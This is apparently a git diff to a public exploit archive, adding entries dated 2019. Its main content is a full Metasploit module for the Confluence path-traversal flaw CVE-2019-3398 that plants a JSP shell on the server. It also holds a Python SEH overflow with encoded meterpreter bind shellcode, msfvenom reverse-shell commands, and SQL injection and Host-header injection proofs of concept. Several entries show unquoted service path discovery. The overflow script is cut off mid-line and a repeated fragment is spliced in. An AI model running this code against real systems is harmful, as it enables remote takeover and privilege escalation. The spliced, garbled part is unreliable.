+ USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server.
+ ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
+ Typical ROOTFOLDER locations are:
+ Windows: Program Files/Atlassian/Confluence/confluence/pages/
+ Linux: opt/atlassian/confluence/confluence/pages/
+ Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).
+ PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files.
+ For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
+ If PAGEID is set to 0, the script will try to create a new Page ID. If it fails, it will try to create a new space and create a Page ID there.
+ If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range.
+ The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the shellcode, then imitates the 'Download all' action to place the shellcode to the root directory of the web server.
+ Tested on Atlassian v6.15.1. on Linux and Windows.
+ Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Maxim Guslyaev' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-3398' ],
+ [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html' ],
+ [ 'URL', 'https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181'],
+ [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3398']
+ ],
+ 'Privileged' => false,
+ 'Platform' => %w{ linux win },
+ 'Targets' =>
+ [
+ [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_JAVA }],
+ [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_JAVA }]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 8090,
+ 'SSL' => false
+ },
+ 'DisclosureDate' => 'Nov 9 2019',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'The login to log into the web interface of the Atlassian Confluence server', 'test']),
+ OptString.new('PASSWORD', [true, 'The password to log into the web interface of the Atlassian Confluence server', 'test']),
+ OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'Program Files/Atlassian/Confluence/confluence/pages/']),
+ #OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'opt/atlassian/confluence/confluence/pages/']),
+ OptString.new('FILENAME', [true, 'The JSP shellcode file name', 'covfefe.jsp']),
+ OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+ OptString.new('NEWSPACE', [false, 'A new space to be created', 'TESTSPACE432545645']),
+ OptInt.new('PAGEID', [false, 'A Page ID to be used to upload shellcode', 0]),
+ OptInt.new('PAGEID_RANGE_START', [false, 'The first Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '1']),
+ OptInt.new('PAGEID_RANGE_END', [false, 'The last Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '999999999']),
+
+ ], self.class)
+end
+
+def do_authenticate
+ print_status("Sending POST request to the web application (authentication)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/dologin.action'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'os_username' => datastore['USERNAME'],
+ 'os_password' => datastore['PASSWORD'],
+ 'os_destination' => '',
+ 'login' => 'Log+In'
+ }
+ })
+ if res.nil?
+ print_status("Unable to access the web application!")
+ return 0
+ end
+ @sessid = get_sid(res)
+ if @sessid.nil?
+ print_status("Unable to retrieve session ID!")
+ return 0
+ end
+ print_status("Getting Session ID from the web application... #{@sessid}")
+
+ if res && res.redirect?
+ location = res.redirection
+ if location.nil?
+ print_status("Unable to access the web application when redirected!")
+ return 0
+ end
+ res = send_request_cgi!({
+ 'uri' => normalize_uri(target_uri.path.to_s, location.to_s),
+ 'method' => 'GET',
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ }, redirect_depth = 5)
+ end
+
+ if res && res.code == 200
+ if res.body =~ /re-enter\syour\slogin/ || res.body =~ /Sorry,\syour\susername\sand\/or\spassword\sare\sincorrect/ || res.body =~ /Unauthorized/
+ print_status("Authentication failed...")
+ return 0
+ end
+
+ @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
+ if @xsrf_token.nil? or @xsrf_token.blank?
+ print_status("Failed to retrieve XSRF token...")
+ return 0
+ else
+ print_status("Retrieving XSRF token... #{@xsrf_token}")
+ return 1
+ end
+ else
+ print_status("Unexpected response from the web application...")
+ return 0
+ end
+end
+
+def do_upload(_pageid)
+ print_status("Sending POST request to the web application (shellcode upload)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/plugins/drag-and-drop/upload.action'),
+ 'method' => 'POST',
+ 'vars_get' => {
+ 'pageId' => _pageid,
+ 'filename' => '../../../../../../../../../../' + datastore['ROOTFOLDER'] + datastore['FILENAME'],
+ 'size' => payload.encoded.length,
+ 'mimeType' => 'text/plain',
+ 'spaceKey' => 'isis',
+ 'atl_token' => @xsrf_token,
+ 'name' => datastore['FILENAME']
+ },
+ 'data' => payload.encoded,
+ 'headers' => {
+ 'Connection' => 'close',
+ 'Accept' => '*/*',
+ 'Accept-Encoding' => 'identity',
+ 'Cookie' => @sessid,
+ 'Content-Length' => payload.encoded.length,
+ 'Content-Type' => 'text/plain'
+ }
+ })
+ if res && res.code == 200 && res.body.scan(/actionErrors/).blank?
+ print_status("Shellcode uploaded...")
+ return 1
+ else
+ return 0
+ end
+end
+
+def do_downloadall(_pageid)
+ for downloadall_iter in 1..10
+ print_status("Sending GET request to the web application (downloadall)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/downloadallattachments.action'),
+ 'method' => 'GET',
+ 'vars_get' => {
+ 'pageId' => _pageid
+ },
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ })
+
+ print_status("Sending GET request to the web application (shellcode invokation)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/' + datastore['FILENAME']),
+ 'method' => 'GET',
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ }, timeout = 10)
+
+ if res && res.code == 200
+ print_status("Shellcode found...")
+ return 1
+ else
+ if downloadall_iter == 10
+ print_status("Shellcode not found...")
+ return 0
+ end
+ end
+ end
+end
+
+def do_getspaces
+ print_status("Sending GET request to the web application (getting available spaces)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
+ 'method' => 'GET',
+ 'headers' => {
+ 'User-Agent' => 'python-requests/2.20.0',
+ 'Cookie' => @sessid,
+ 'Accept' => '*/*',
+ 'Accept-Encoding' => 'identity',
+ 'Content-Type' => 'application/json'
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /results/
+ space_list = res.body.scan(/\"key\":\"(\w+)\"/).flatten
+ else
+ space_list = Array([])
+ end
+ return space_list
+end
+
+def do_createspace
+ print_status("Sending POST request to the web application (creating a space)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
+ 'method' => 'POST',
+ 'data' => {
+ "key": datastore['NEWSPACE'],
+ "name": "Example space",
+ "description": {
+ "plain": {
+ "value": "This is an example space",
+ "representation": "plain"
+ }
+ },
+ "metadata": {}
+ }.to_json,
+ 'headers' => {
+ 'User-Agent' => 'python-requests/2.20.0',
+ 'Cookie' => @sessid,
+ 'Accept-Encoding' => 'identity',
+ 'Content-Type' => 'application/json'
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /\"key\":\"\w+\"/
+ print_status("Space created...")
+ return res.body.scan(/\"key\":\"(\w+)\"/).flatten[0]
+ else
+ print_status("Space not created...")
+ return 0
+ end
+end
+
+def do_createpage(_space)
+ print_status("Sending GET request to the web application (creating Page ID), space #{_space}...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/createpage.action?spaceKey='+_space),
+ 'method' => 'GET',
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ })
+ if res && res.code == 200 && res.body =~ /ajs-draft-id/
+ pageid = res.get_html_document.at('meta[@name="ajs-draft-id"]')['content']
+ pageid_parsed = /(\d+)/.match(pageid)
+ if pageid_parsed.nil?
+ print_status("Unexpected Page ID format...")
+ return 0
+ else
+ print_status("Page ID created... #{pageid}")
+ datastore['PAGEID'] = pageid
+ return 1
+ end
+ else
+ return 0
+ end
+end
+
+def get_sid(res)
+ if res.nil?
+ return ''
+ end
+ res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
+end
+
+
+def exploit
+ print_status("Getting authenticated to the web application...")
+ if do_authenticate != 1
+ fail_with(Failure::Unknown, 'Initial access or authentication error!')
+ end
+
+ unless datastore['PAGEID'].blank?
+ if datastore['PAGEID'] == 0
+ print_status("Creating Page ID...")
+ spaces = do_getspaces
+ for sp in spaces
+ if do_createpage(sp) == 1
+ print_status("Uploading shellcode...")
+ if do_upload(datastore['PAGEID']) != 1
+ print_status("Failed to upload shellcode...")
+ next
+ end
+ print_status("Invoking shellcode...")
+ if do_downloadall(datastore['PAGEID']) != 1
+ print_status("Failed to invoke shellcode...")
+ next
+ else
+ return
+ end
+ end
+ end
+
+ print_status("Trying to create a new space...")
+ new_sp = do_createspace
+
+ if new_sp != 0
+ if do_createpage(new_sp) == 1
+ print_status("Uploading shellcode...")
+ if do_upload(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while uploading shellcode!')
+ end
+ print_status("Invoking shellcode...")
+ if do_downloadall(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while invoking shellcode!')
+ end
+
+ return
+ else
+ fail_with(Failure::Unknown, 'Error while creating page in the newly created space!')
+ end
+ else
+ fail_with(Failure::Unknown, 'Error while creating space!')
+ end
+ end
+
+ print_status("Uploading shellcode...")
+ if do_upload(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while uploading shellcode!')
+ end
+ print_status("Invoking shellcode...")
+ if do_downloadall(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while invoking shellcode!')
+ end
+ else
+ for id in datastore['PAGEID_RANGE_START']..datastore['PAGEID_RANGE_END']
+ print_status("Trying Page Id #{id}")
+ print_status("Uploading shellcode...")
+ if do_upload(id) == 1
+ print_status("Invoking shellcode...")
+ if do_downloadall(id) == 1
+ break
+ end
+ end
+ end
+ end
+
+end
+
+def check
+ res = send_request_cgi!({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/login.action?anon=1&logout=1'),
+ 'method' => 'GET',
+ }, redirect_depth = 5)
+
+ if res && res.body =~ /Powered\sby/
+ ver = res.body.scan(/^.*Powered\sby\s.*(\d{1,}\.\d{1,}\.\d{1,}).*$/).flatten[0]
+ print_status("The version of the web application is #{ver}")
+ ver_parsed = /(\d+)\.(\d+)\.(\d+)/.match(ver.to_s)
+ if ver_parsed.nil?
+ print_status("The version of the web application couldn't be parsed")
+ return Exploit::CheckCode::Detected
+ end
+ ver_oct1 = ver_parsed[1].to_i
+ ver_oct2 = ver_parsed[2].to_i
+ ver_oct3 = ver_parsed[3].to_i
+
+ if ver_oct1.between?(2, 6) && ver_oct2.between?(0, 6) && ver_oct3.between?(0, 12) || ver_oct1.between?(6, 6) && ver_oct2.between?(7, 12) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(13, 13) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(14, 14) && ver_oct3.between?(0, 2) || ver_oct1.between?(6, 6) && ver_oct2.between?(15, 15) && ver_oct3.between?(0, 1)
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ else
+ return Exploit::CheckCode::Unknown
+ end
+end
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47631.txt b/exploits/php/webapps/47631.txt
new file mode 100644
index 000000000..507cdad9b
--- /dev/null
+++ b/exploits/php/webapps/47631.txt
@@ -0,0 +1,16 @@
+# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : N/A
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
+# PoC (id param):
+
+http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510
\ No newline at end of file
diff --git a/exploits/php/webapps/47632.txt b/exploits/php/webapps/47632.txt
new file mode 100644
index 000000000..bcbb83eb3
--- /dev/null
+++ b/exploits/php/webapps/47632.txt
@@ -0,0 +1,237 @@
+# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
+# Author: Pablo Santiago
+# Date: 2019-11-12
+# Vendor Homepage: https://www.joomla.org/
+# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
+# Version: 3.9.13
+# CVE : N/A
+# Tested on: Windows 10
+
+#PoC
+
+curl http://localhost/joomla/ -H "Host: exploit-db.com"
+
+
+
+
+
+
+
+
+
+ Home
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ -
+ You are here:
+
+
+ -
+
+ Home
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+#PoC Visual
+https://imgur.com/a/IgO4ZxI
\ No newline at end of file
diff --git a/exploits/windows/local/47615.txt b/exploits/windows/local/47615.txt
new file mode 100644
index 000000000..c24356fb9
--- /dev/null
+++ b/exploits/windows/local/47615.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path
+# Date: 2019-11-11
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.acronis.com
+# Software: ftp://supportdownload:supportdownload@ftp.kingston.com/AcronisTrueImageOEM_5128.exe
+# Version: 19.0.5128
+# Tested on: Windows 10
+
+# Description:
+# Acronis True Image OEM 19.0.5128 suffers from an unquoted search path issue impacting the service 'afcdpsrv'. This could potentially allow an
+# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
+# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
+# of the application.
+
+# Prerequisites
+# Local, Non-privileged Local User with restart capabilities
+
+# Details
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Acronis Nonstop Backup Service afcdpsrv C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe Auto
+
+C:\>sc qc afcdpsrv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: afcdpsrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Acronis Nonstop Backup Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47617.txt b/exploits/windows/local/47617.txt
new file mode 100644
index 000000000..d28e21eaf
--- /dev/null
+++ b/exploits/windows/local/47617.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: chuyreds
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 2.4.3.231
+# Tested on: Windows 10 Home Single Language
+# CVE : N/A
+
+# Explot-Wondershare WsAppService.txt
+
+#Service Info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto
+
+
+C:\Users\user>sc query WsAppService
+
+NOMBRE_SERVICIO: WsAppService
+ TIPO : 10 WIN32_OWN_PROCESS
+ ESTADO : 4 RUNNING
+ (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
+ CÓD_SALIDA_WIN32 : 0 (0x0)
+ CÓD_SALIDA_SERVICIO: 0 (0x0)
+ PUNTO_COMPROB. : 0x0
+ INDICACIÓN_INICIO : 0x0
\ No newline at end of file
diff --git a/exploits/windows/local/47637.txt b/exploits/windows/local/47637.txt
new file mode 100644
index 000000000..f49441761
--- /dev/null
+++ b/exploits/windows/local/47637.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
+# Date: 2019-11-12
+# Exploit Author: Mario Rodriguez
+# Vendor Homepage: https://www.alps.com/e/
+# Software Link: https://www.alps.com/e/
+# Version: 8.1202.1711.04
+# Tested on: Windows 10 Home x64 Spanish
+
+#The Alps Pointing-device controller installs a service with an unquoted path
+#which could be used as a local privilege escalation vulnerability. To exploit this vulnerability,
+#an executable file could be placed in the path of the service and after rebooting the system or
+#restarting the service the malicious code will be executed with elevated privileges.
+
+#Step to discover the vulnerability
+
+C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+Alps HID Monitor Service ApHidMonitorService C:\Program Files\Apoint2K\HidMonitorSvc.exe Auto
+
+C:\Users\user>sc qc ApHidMonitorService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ApHidMonitorService
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Alps HID Monitor Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47642.txt b/exploits/windows/local/47642.txt
new file mode 100644
index 000000000..fbaf9ec99
--- /dev/null
+++ b/exploits/windows/local/47642.txt
@@ -0,0 +1,27 @@
+# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: chuyreds
+# Vendor Homepage:https://www.realtek.com/en/
+# Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
+# Version: 6.4.10041.133
+# Tested on: Windows 10 Home Single Language
+# CVE : N/A
+
+# Explot-Realtek.txt
+
+#Service Info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+RTK IIS Codec Service RtkI2SCodec C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe Auto
+
+C:\Users\user>sc query RtkI2SCodec
+
+NOMBRE_SERVICIO: RtkI2SCodec
+ TIPO : 10 WIN32_OWN_PROCESS
+ ESTADO : 4 RUNNING
+ (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
+ CÓD_SALIDA_WIN32 : 0 (0x0)
+ CÓD_SALIDA_SERVICIO: 0 (0x0)
+ PUNTO_COMPROB. : 0x0
+ INDICACIÓN_INICIO : 0x0
\ No newline at end of file
diff --git a/exploits/windows/local/47645.py b/exploits/windows/local/47645.py
new file mode 100755
index 000000000..e44561251
--- /dev/null
+++ b/exploits/windows/local/47645.py
@@ -0,0 +1,148 @@
+# Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH)
+# Date: 2019-11-09
+# Exploit Author: Samir sanchez garnica @sasaga92
+# Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
+# Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=downloadtabdown
+# Version: 6.2.9
+# Tested: Windows 10 pro N and Windows XP SP3
+# CVE : N/A
+
+#!/usr/bin/python
+'''
+Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad
+considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH)
+'''
+
+import sys
+import random
+import string
+import struct
+import argparse
+
+def pattern_create(_type,_length):
+ _type = _type.split(" ")
+
+ if _type[0] == "trash":
+ return _type[1] * _length
+ elif _type[0] == "random":
+ return ''.join(random.choice(string.lowercase) for i in range(_length))
+ elif _type[0] == "pattern":
+ _pattern = ''
+ _parts = ['A', 'a', '0']
+ while len(_pattern) != _length:
+ _pattern += _parts[len(_pattern) % 3]
+ if len(_pattern) % 3 == 0:
+ _parts[2] = chr(ord(_parts[2]) + 1)
+ if _parts[2] > '9':
+ _parts[2] = '0'
+ _parts[1] = chr(ord(_parts[1]) + 1)
+ if _parts[1] > 'z':
+ _parts[1] = 'a'
+ _parts[0] = chr(ord(_parts[0]) + 1)
+ if _parts[0] > 'Z':
+ _parts[0] = 'A'
+ return _pattern
+ else:
+ return "Not Found"
+
+
+def generate_file(_name_file, _payload):
+ print _payload
+ print "[+] Creando Archivo malicioso"
+ _name_file = open(_name_file,"w+")
+ _name_file.write(_payload)
+ _name_file.close()
+ print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))
+
+def main():
+ _parser = argparse.ArgumentParser()
+ _parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True)
+ _args = _parser.parse_args()
+
+ #badchars 0x0a, 0x0d, >= 0x80
+
+ _name_exploit = "ControlCenterPRO_v6_2_9.txt"
+
+ #sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
+ _shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+ "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+ "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+ "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
+ "\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
+ "\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
+ "\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
+ "\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
+ "\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
+ "\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
+ "\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
+ "\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
+ "\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
+ "\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
+ "\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
+ "\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
+ "\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
+ "\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
+ "\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
+ "\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
+ "\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
+ "\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
+ "\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
+ "\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
+ "\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
+ "\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
+ "\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
+ "\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
+ "\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
+ "\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
+ "\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
+ "\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
+ "\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
+ "\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
+ "\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
+ "\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
+ "\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
+ "\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
+ "\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
+ "\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
+ "\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
+ "\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
+ "\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
+ "\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
+ "\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
+ "\x53\x41\x41")
+
+ _offset = 664
+ _padding = 40000
+ _nseh = "\x42\x42\x77\x08"
+ _seh = struct.pack("wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto
+
+
+C:\Users\user>sc query WsAppService
+
+NOMBRE_SERVICIO: WsAppService
+ TIPO : 10 WIN32_OWN_PROCESS
+ ESTADO : 4 RUNNING
+ (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
+ CÓD_SALIDA_WIN32 : 0 (0x0)
+ CÓD_SALIDA_SERVICIO: 0 (0x0)
+ PUNTO_COMPROB. : 0x0
+ INDICACIÓN_INICIO : 0x0
\ No newline at end of file
diff --git a/exploits/windows/remote/47554.py b/exploits/windows/remote/47554.py
index e1e8b92f2..c71a7de2f 100755
--- a/exploits/windows/remote/47554.py
+++ b/exploits/windows/remote/47554.py
@@ -5,7 +5,7 @@
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Tested on: Windows 10
-# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯
+# Note: Every version of Windows 10 has a different offset and sometimes you need to run the exploit twice before you can pop a shell ¯\_(ツ)_/¯
#!/usr/bin/python
@@ -13,7 +13,7 @@ import sys
import socket
import time
-#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISYTENING_PORT -b '\x00\xd9' -f python
+#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISTENING_PORT -b '\x00\xd9' -f python
buf = ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
diff --git a/files_exploits.csv b/files_exploits.csv
index 82ef470ff..6719156fb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10764,6 +10764,12 @@ id,file,description,date,author,type,platform,port
47604,exploits/windows/local/47604.txt,"_GCafé 3.0 - 'gbClienService' Unquoted Service Path",2019-11-11,4ll4u,local,windows,
